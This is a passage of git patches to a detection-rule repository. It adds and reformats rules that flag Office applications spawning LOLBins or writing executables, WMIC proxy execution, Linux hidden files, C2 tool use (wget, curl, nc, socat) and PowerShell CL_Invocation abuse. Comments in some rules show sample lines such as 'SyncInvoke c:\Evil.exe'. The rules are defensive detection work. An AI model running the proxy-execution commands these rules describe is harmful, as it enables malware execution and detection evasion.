- ".bat" - - ".scr" - - ".proj" - selection4: - FileMagicBytes|startswith: - - "4D5A" - condition: selection1 AND selection2 AND (selection3 OR selection4) -falsepositives: -- Unknown -level: high +title: Executable and Files creation by Office Applications +description: This rule will monitor executable and script file creation by office applications. Please add more file extentions or magic bytes to the logic of your choice. +references: + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" +tags: + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: Windows + service: Sysmon + category: process_creation +detection: + #useful_information: Please add more file extentions and magic bytes to the logic of your choice. + selection1: + EventType: + - FileCreate + - FileRename + EventID: 11 + selection2: + Image|endswith: + - 'winword.exe' + - 'excel.exe' + - 'powerpnt.exe' + selection3: + FileName|endswith: + - ".exe" + - ".dll" + - ".ocx" + - ".com" + - ".ps1" + - ".vbs" + - ".sys" + - ".bat" + - ".scr" + - ".proj" + selection4: + FileMagicBytes|startswith: + - "4D5A" + condition: selection1 AND selection2 AND (selection3 OR selection4) +falsepositives: +- Unknown +level: high diff --git a/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml index a91cfcc2..bf8dbf9f 100644 --- a/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml +++ b/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml @@ -1,37 +1,37 @@ -title: LOLBins Process Created With Office Application -description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. -references: - - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" -tags: - - attack.t1204.002 - - attack.t1047 - - attack.t1218.010 - - attack.execution - - attack.defence_evasion -status: experimental -Date: 2021/23/8 -logsource: - product: Windows - category: process_creation -detection: - #useful_information: add more LOLBins to the rules logic of your choice. - selection1: - EventID: 1 - selection2: - Image|endswith: - - 'regsvr32' - - 'rundll32' - - 'msiexec' - - 'mshta' - - 'verclsid' - selection3: - ParentImage|endswith: - - winword.exe - - excel.exe - - powerpnt.exe - condition: selection1 AND selection2 AND selection3 -falsepositives: - - Unknown -level: high +title: LOLBins Process Created With Office Application +description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. +references: + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" +tags: + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: Windows + category: process_creation +detection: + #useful_information: add more LOLBins to the rules logic of your choice. + selection1: + EventID: 1 + selection2: + Image|endswith: + - 'regsvr32' + - 'rundll32' + - 'msiexec' + - 'mshta' + - 'verclsid' + selection3: + ParentImage|endswith: + - winword.exe + - excel.exe + - powerpnt.exe + condition: selection1 AND selection2 AND selection3 +falsepositives: + - Unknown +level: high diff --git a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml index 055e8faf..5423077e 100644 --- a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml +++ b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml @@ -1,35 +1,35 @@ -title: LOLBins Process Created With WmiPrvSE -description: This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed. -references: - - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" -tags: - - attack.t1204.002 - - attack.t1047 - - attack.t1218.010 - - attack.execution - - attack.defence_evasion -status: experimental -Date: 2021/23/8 -logsource: - product: Windows - category: process_creation -detection: - #useful_information: add more LOLBins to the rules logic of your choice. - selection1: - EventID: 1 - selection2: - Image|endswith: - - 'regsvr32' - - 'rundll32' - - 'msiexec' - - 'mshta' - - 'verclsid' - selection3: - ParentImage|endswith: - - "\\wbem\\WmiPrvSE.exe" - condition: selection1 AND selection2 AND selection3 -falsepositives: -- FPs are possible here, but some LOLBins weren't excluded for obvious reasons. -level: high +title: LOLBins Process Created With WmiPrvSE +description: This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed. +references: + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" +tags: + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: Windows + category: process_creation +detection: + #useful_information: add more LOLBins to the rules logic of your choice. + selection1: + EventID: 1 + selection2: + Image|endswith: + - 'regsvr32' + - 'rundll32' + - 'msiexec' + - 'mshta' + - 'verclsid' + selection3: + ParentImage|endswith: + - "\\wbem\\WmiPrvSE.exe" + condition: selection1 AND selection2 AND selection3 +falsepositives: +- FPs are possible here, but some LOLBins weren't excluded for obvious reasons. +level: high diff --git a/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml b/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml index bd8f9bfb..6ee87b6c 100644 --- a/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml +++ b/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml @@ -1,47 +1,47 @@ -title: Excel Proxy Executing Regsvr32 With Payload -description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicous parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. -references: - - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" -tags: - - attack.t1204.002 - - attack.t1047 - - attack.t1218.010 - - attack.execution - - attack.defence_evasion -status: experimental -Date: 2021/23/8 -logsource: - product: Windows - category: process_creation -detection: - #useful_information: add more LOLBins to the rules logic of your choice. - selection1: - EventID: 1 - selection2: - - Image: '*\wbem\WMIC.exe' - - ProcessCommandLine: '*wmic *' - - OriginalFileName: 'wmic.exe' - - Description: 'WMI Commandline Utility' - selection3: - CommandLine|contains: - - 'regsvr32' - - 'rundll32' - - 'msiexec' - - 'mshta' - - 'verclsid' - selection4: - ParentImage|endswith: - - winword.exe - - excel.exe - - powerpnt.exe - selection5: - processCommandLine|contains|all: - - 'process' - - 'create' - - 'call' - condition: selection1 AND selection2 AND selection3 AND selection4 AND selection5 -falsepositives: -- Unknown -level: high +title: Excel Proxy Executing Regsvr32 With Payload +description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicous parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. +references: + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" +tags: + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: Windows + category: process_creation +detection: + #useful_information: add more LOLBins to the rules logic of your choice. + selection1: + EventID: 1 + selection2: + - Image: '*\wbem\WMIC.exe' + - ProcessCommandLine: '*wmic *' + - OriginalFileName: 'wmic.exe' + - Description: 'WMI Commandline Utility' + selection3: + CommandLine|contains: + - 'regsvr32' + - 'rundll32' + - 'msiexec' + - 'mshta' + - 'verclsid' + selection4: + ParentImage|endswith: + - winword.exe + - excel.exe + - powerpnt.exe + selection5: + processCommandLine|contains|all: + - 'process' + - 'create' + - 'call' + condition: selection1 AND selection2 AND selection3 AND selection4 AND selection5 +falsepositives: +- Unknown +level: high From be442182fe2543c7cd45820ed5e7b93ab6b068b1 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 6 Sep 2021 21:10:08 +0200 Subject: [PATCH 0760/1367] convert to LF --- ...ocess_Creations_by_Office_applications.yml | 72 ++++++++-------- ...ice_applications_using_file_extentions.yml | 84 +++++++++---------- ...Applications_Spawning_WMI_command-line.yml | 70 ++++++++-------- 3 files changed, 113 insertions(+), 113 deletions(-) diff --git a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml index 287a7208..84e82010 100644 --- a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml +++ b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml @@ -1,36 +1,36 @@ -title: Created Executables and Files by Office Applications -id: a9505d16-644f-4f24-9002-7c322675e40d -description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. -references: - - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" -tags: - - attack.t1204.002 - - attack.t1047 - - attack.t1218.010 - - attack.execution - - attack.defence_evasion -status: experimental -Date: 2021/08/23 -logsource: - product: Windows - category: process_creation -detection: - #useful_information: add more LOLBins to the rules logic of your choice. - selection1: - Image|endswith: - - 'regsvr32' - - 'rundll32' - - 'msiexec' - - 'mshta' - - 'verclsid' - selection2: - ParentImage|endswith: - - winword.exe - - excel.exe - - powerpnt.exe - condition: selection1 AND selection2 -falsepositives: - - Unknown -level: high +title: Created Executables and Files by Office Applications +id: a9505d16-644f-4f24-9002-7c322675e40d +description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. +references: + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" +tags: + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion +status: experimental +Date: 2021/08/23 +logsource: + product: Windows + category: process_creation +detection: + #useful_information: add more LOLBins to the rules logic of your choice. + selection1: + Image|endswith: + - 'regsvr32' + - 'rundll32' + - 'msiexec' + - 'mshta' + - 'verclsid' + selection2: + ParentImage|endswith: + - winword.exe + - excel.exe + - powerpnt.exe + condition: selection1 AND selection2 +falsepositives: + - Unknown +level: high diff --git a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index 81a3348f..0193aefe 100644 --- a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml @@ -1,42 +1,42 @@ -title: Created Executables and Files by Office Applications -description: This rule will monitor executable and script file creation by office applications. Please add more file extentions or magic bytes to the logic of your choice. -references: - - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" -tags: - - attack.t1204.002 - - attack.t1047 - - attack.t1218.010 - - attack.execution - - attack.defence_evasion -status: experimental -Date: 2021/23/8 -logsource: - product: Windows - category: process_creation -detection: - #useful_information: Please add more file extentions to the logic of your choice. - selection1: - EventID: 11 - selection2: - Image|endswith: - - 'winword.exe' - - 'excel.exe' - - 'powerpnt.exe' - selection3: - TargetFileName|endswith: - - ".exe" - - ".dll" - - ".ocx" - - ".com" - - ".ps1" - - ".vbs" - - ".sys" - - ".bat" - - ".scr" - - ".proj" - condition: selection1 AND selection2 AND selection3 -falsepositives: -- Unknown -level: high +title: Created Executables and Files by Office Applications +description: This rule will monitor executable and script file creation by office applications. Please add more file extentions or magic bytes to the logic of your choice. +references: + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" +tags: + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: Windows + category: process_creation +detection: + #useful_information: Please add more file extentions to the logic of your choice. + selection1: + EventID: 11 + selection2: + Image|endswith: + - 'winword.exe' + - 'excel.exe' + - 'powerpnt.exe' + selection3: + TargetFileName|endswith: + - ".exe" + - ".dll" + - ".ocx" + - ".com" + - ".ps1" + - ".vbs" + - ".sys" + - ".bat" + - ".scr" + - ".proj" + condition: selection1 AND selection2 AND selection3 +falsepositives: +- Unknown +level: high diff --git a/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml index 92cb14f0..74777966 100644 --- a/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml +++ b/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml @@ -1,35 +1,35 @@ -title: Office Applications Spawning Wmi Cli -description: Initial execution of malicious document calls wmic to execute the file with regsvr32 -references: - - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" -tags: - - attack.t1204.002 - - attack.t1047 - - attack.t1218.010 - - attack.execution - - attack.defence_evasion -status: experimental -Date: 2021/23/8 -logsource: - product: windows - category: process_creation -detection: - #useful_information: Add more office applications to the rule logic of choice - selection1: - EventID: 1 - selection2: - - Image: '\wbem\WMIC.exe' - - CommandLine: '*wmic *' - - OriginalFileName: 'wmic.exe' - - Description: 'WMI Commandline Utility' - selection3: - - ParentPrcessName|endswith: - - winword.exe - - excel.exe - - powerpnt.exe - condition: selection1 AND selection2 AND selection3 -falsepositives: -- Unknown -level: high +title: Office Applications Spawning Wmi Cli +description: Initial execution of malicious document calls wmic to execute the file with regsvr32 +references: + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" +tags: + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: windows + category: process_creation +detection: + #useful_information: Add more office applications to the rule logic of choice + selection1: + EventID: 1 + selection2: + - Image: '\wbem\WMIC.exe' + - CommandLine: '*wmic *' + - OriginalFileName: 'wmic.exe' + - Description: 'WMI Commandline Utility' + selection3: + - ParentPrcessName|endswith: + - winword.exe + - excel.exe + - powerpnt.exe + condition: selection1 AND selection2 AND selection3 +falsepositives: +- Unknown +level: high From bba66ca762126855406e3851753fe844376babe1 Mon Sep 17 00:00:00 2001 From: zakibro <48967550+zakibro@users.noreply.github.com> Date: Tue, 7 Sep 2021 07:57:50 +0200 Subject: [PATCH 0761/1367] Update lnx_auditd_hidden_files_directories.yml Updating arguments section --- rules/linux/auditd/lnx_auditd_hidden_files_directories.yml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml b/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml index ec1dac52..629d40c9 100644 --- a/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml +++ b/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml @@ -20,8 +20,10 @@ detection: - nano - vi arguments: - - a1|re: '\.(.*)' - - a2|re: '\.(.*)' # in case there are some other arguments being used in a1 + - a1|contains: '/.' + - a1|startswith: '.' + - a2|contains: '/.' + - a2|startswith: '.' condition: commands and arguments tags: - attack.defense_evasion From 33be089ea2acd6ce36e971fe2af8b6119fdaa42b Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 7 Sep 2021 09:16:35 +0200 Subject: [PATCH 0762/1367] fix: filename to lowercase --- .../auditd/lnx_auditd_susp_c2_commands.yml | 21 ++++++++++++++ .../powershell_cl_Invocation_lolscript.yml | 27 +++++++++++++++++ .../powershell_cl_Invocation_lolscript_v2.yml | 29 +++++++++++++++++++ ...powershell_cl_Mutexverifiers_lolscript.yml | 27 +++++++++++++++++ ...ershell_cl_Mutexverifiers_lolscript_v2.yml | 29 +++++++++++++++++++ 5 files changed, 133 insertions(+) create mode 100644 rules/linux/auditd/lnx_auditd_susp_c2_commands.yml create mode 100644 rules/windows/powershell/powershell_cl_Invocation_lolscript.yml create mode 100644 rules/windows/powershell/powershell_cl_Invocation_lolscript_v2.yml create mode 100644 rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript.yml create mode 100644 rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript_v2.yml diff --git a/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml b/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml new file mode 100644 index 00000000..8b145606 --- /dev/null +++ b/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml @@ -0,0 +1,21 @@ +title: Suspicious C2 Activities +id: f7158a64-6204-4d6d-868a-6e6378b467e0 +status: experimental +description: Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'. This includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap. These commands match a few techniques from the tactics "Command and Control", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132) +author: Marie Euler +references: + - 'https://github.com/Neo23x0/auditd' +date: 2020/05/18 +logsource: + product: linux + service: auditd +detection: + selection: + key: + - 'susp_activity' + condition: selection +falsepositives: + - Admin or User activity +level: medium +tags: + - attack.command_and_control \ No newline at end of file diff --git a/rules/windows/powershell/powershell_cl_Invocation_lolscript.yml b/rules/windows/powershell/powershell_cl_Invocation_lolscript.yml new file mode 100644 index 00000000..3976c19f --- /dev/null +++ b/rules/windows/powershell/powershell_cl_Invocation_lolscript.yml @@ -0,0 +1,27 @@ +title: Execution via CL_Invocation.ps1 +id: 4cd29327-685a-460e-9dac-c3ab96e549dc +description: Detects Execution via SyncInvoke in CL_Invocation.ps1 module +status: experimental +author: oscd.community, Natalia Shornikova +date: 2020/10/14 +modified: 2021/05/21 +references: + - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/Cl_invocation.yml + - https://twitter.com/bohops/status/948061991012327424 +tags: + - attack.defense_evasion + - attack.t1216 +logsource: + product: windows + service: powershell + definition: 'Script block logging must be enabled' +detection: + selection: + EventID: 4104 + ScriptBlockText|contains|all: + - 'CL_Invocation.ps1' + - 'SyncInvoke' + condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/powershell/powershell_cl_Invocation_lolscript_v2.yml b/rules/windows/powershell/powershell_cl_Invocation_lolscript_v2.yml new file mode 100644 index 00000000..5cd1d3ad --- /dev/null +++ b/rules/windows/powershell/powershell_cl_Invocation_lolscript_v2.yml @@ -0,0 +1,29 @@ +title: Execution via CL_Invocation.ps1 (2 Lines) +id: f588e69b-0750-46bb-8f87-0e9320d57536 +description: Detects Execution via SyncInvoke in CL_Invocation.ps1 module +status: experimental +author: oscd.community, Natalia Shornikova +date: 2020/10/14 +modified: 2021/05/21 +references: + - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/Cl_invocation.yml + - https://twitter.com/bohops/status/948061991012327424 +tags: + - attack.defense_evasion + - attack.t1216 +logsource: + product: windows + service: powershell + definition: 'Script block logging must be enabled' +detection: + selection2: + EventID: 4104 + ScriptBlockText|contains: + - 'CL_Invocation.ps1' + - 'SyncInvoke' + condition: selection2 | count(ScriptBlockText) by Computer > 2 + # PS > Import-Module c:\Windows\diagnostics\system\Audio\CL_Invocation.ps1 + # PS > SyncInvoke c:\Evil.exe +falsepositives: + - Unknown +level: high diff --git a/rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript.yml b/rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript.yml new file mode 100644 index 00000000..a9e742a2 --- /dev/null +++ b/rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript.yml @@ -0,0 +1,27 @@ +title: Execution via CL_Mutexverifiers.ps1 +id: 39776c99-1c7b-4ba0-b5aa-641525eee1a4 +description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module +status: experimental +author: oscd.community, Natalia Shornikova +date: 2020/10/14 +modified: 2021/05/21 +references: + - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/CL_mutexverifiers.yml + - https://twitter.com/pabraeken/status/995111125447577600 +tags: + - attack.defense_evasion + - attack.t1216 +logsource: + product: windows + service: powershell + definition: 'Script block logging must be enabled' +detection: + selection: + EventID: 4104 + ScriptBlockText|contains|all: + - 'CL_Mutexverifiers.ps1' + - 'runAfterCancelProcess' + condition: selection +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript_v2.yml b/rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript_v2.yml new file mode 100644 index 00000000..8a0fa3a3 --- /dev/null +++ b/rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript_v2.yml @@ -0,0 +1,29 @@ +title: Execution via CL_Mutexverifiers.ps1 (2 Lines) +id: 6609c444-9670-4eab-9636-fe4755a851ce +description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module +status: experimental +author: oscd.community, Natalia Shornikova +date: 2020/10/14 +modified: 2021/05/21 +references: + - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/CL_mutexverifiers.yml + - https://twitter.com/pabraeken/status/995111125447577600 +tags: + - attack.defense_evasion + - attack.t1216 +logsource: + product: windows + service: powershell + definition: 'Script block logging must be enabled' +detection: + selection2: + EventID: 4104 + ScriptBlockText|contains: + - 'CL_Mutexverifiers.ps1' + - 'runAfterCancelProcess' + condition: selection2 | count(ScriptBlockText) by Computer > 2 + # PS > Import-Module c:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 + # PS > runAfterCancelProcess c:\Evil.exe +falsepositives: + - Unknown +level: high From 0cce1c0245ab3cbe29335bf8f91741bbb8e9305e Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 7 Sep 2021 09:17:25 +0200 Subject: [PATCH 0763/1367] fix: missing lowercase chars --- .../powershell_cl_invocation_lolscript.yml | 27 +++++++++++++++++ .../powershell_cl_invocation_lolscript_v2.yml | 29 +++++++++++++++++++ ...powershell_cl_mutexverifiers_lolscript.yml | 27 +++++++++++++++++ ...ershell_cl_mutexverifiers_lolscript_v2.yml | 29 +++++++++++++++++++ 4 files changed, 112 insertions(+) create mode 100644 rules/windows/powershell/powershell_cl_invocation_lolscript.yml create mode 100644 rules/windows/powershell/powershell_cl_invocation_lolscript_v2.yml create mode 100644 rules/windows/powershell/powershell_cl_mutexverifiers_lolscript.yml create mode 100644 rules/windows/powershell/powershell_cl_mutexverifiers_lolscript_v2.yml diff --git a/rules/windows/powershell/powershell_cl_invocation_lolscript.yml b/rules/windows/powershell/powershell_cl_invocation_lolscript.yml new file mode 100644 index 00000000..3976c19f --- /dev/null +++ b/rules/windows/powershell/powershell_cl_invocation_lolscript.yml @@ -0,0 +1,27 @@ +title: Execution via CL_Invocation.ps1 +id: 4cd29327-685a-460e-9dac-c3ab96e549dc +description: Detects Execution via SyncInvoke in CL_Invocation.ps1 module +status: experimental +author: oscd.community, Natalia Shornikova +date: 2020/10/14 +modified: 2021/05/21 +references: + - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/Cl_invocation.yml + - https://twitter.com/bohops/status/948061991012327424 +tags: + - attack.defense_evasion + - attack.t1216 +logsource: + product: windows + service: powershell + definition: 'Script block logging must be enabled' +detection: + selection: + EventID: 4104 + ScriptBlockText|contains|all: + - 'CL_Invocation.ps1' + - 'SyncInvoke' + condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/powershell/powershell_cl_invocation_lolscript_v2.yml b/rules/windows/powershell/powershell_cl_invocation_lolscript_v2.yml new file mode 100644 index 00000000..5cd1d3ad --- /dev/null +++ b/rules/windows/powershell/powershell_cl_invocation_lolscript_v2.yml @@ -0,0 +1,29 @@ +title: Execution via CL_Invocation.ps1 (2 Lines) +id: f588e69b-0750-46bb-8f87-0e9320d57536 +description: Detects Execution via SyncInvoke in CL_Invocation.ps1 module +status: experimental +author: oscd.community, Natalia Shornikova +date: 2020/10/14 +modified: 2021/05/21 +references: + - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/Cl_invocation.yml + - https://twitter.com/bohops/status/948061991012327424 +tags: + - attack.defense_evasion + - attack.t1216 +logsource: + product: windows + service: powershell + definition: 'Script block logging must be enabled' +detection: + selection2: + EventID: 4104 + ScriptBlockText|contains: + - 'CL_Invocation.ps1' + - 'SyncInvoke' + condition: selection2 | count(ScriptBlockText) by Computer > 2 + # PS > Import-Module c:\Windows\diagnostics\system\Audio\CL_Invocation.ps1 + # PS > SyncInvoke c:\Evil.exe +falsepositives: + - Unknown +level: high diff --git a/rules/windows/powershell/powershell_cl_mutexverifiers_lolscript.yml b/rules/windows/powershell/powershell_cl_mutexverifiers_lolscript.yml new file mode 100644 index 00000000..a9e742a2 --- /dev/null +++ b/rules/windows/powershell/powershell_cl_mutexverifiers_lolscript.yml @@ -0,0 +1,27 @@ +title: Execution via CL_Mutexverifiers.ps1 +id: 39776c99-1c7b-4ba0-b5aa-641525eee1a4 +description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module +status: experimental +author: oscd.community, Natalia Shornikova +date: 2020/10/14 +modified: 2021/05/21 +references: + - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/CL_mutexverifiers.yml + - https://twitter.com/pabraeken/status/995111125447577600 +tags: + - attack.defense_evasion + - attack.t1216 +logsource: + product: windows + service: powershell + definition: 'Script block logging must be enabled' +detection: + selection: + EventID: 4104 + ScriptBlockText|contains|all: + - 'CL_Mutexverifiers.ps1' + - 'runAfterCancelProcess' + condition: selection +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/powershell/powershell_cl_mutexverifiers_lolscript_v2.yml b/rules/windows/powershell/powershell_cl_mutexverifiers_lolscript_v2.yml new file mode 100644 index 00000000..8a0fa3a3 --- /dev/null +++ b/rules/windows/powershell/powershell_cl_mutexverifiers_lolscript_v2.yml @@ -0,0 +1,29 @@ +title: Execution via CL_Mutexverifiers.ps1 (2 Lines) +id: 6609c444-9670-4eab-9636-fe4755a851ce +description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module +status: experimental +author: oscd.community, Natalia Shornikova +date: 2020/10/14 +modified: 2021/05/21 +references: + - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/CL_mutexverifiers.yml + - https://twitter.com/pabraeken/status/995111125447577600 +tags: + - attack.defense_evasion + - attack.t1216 +logsource: + product: windows + service: powershell + definition: 'Script block logging must be enabled' +detection: + selection2: + EventID: 4104 + ScriptBlockText|contains: + - 'CL_Mutexverifiers.ps1' + - 'runAfterCancelProcess' + condition: selection2 | 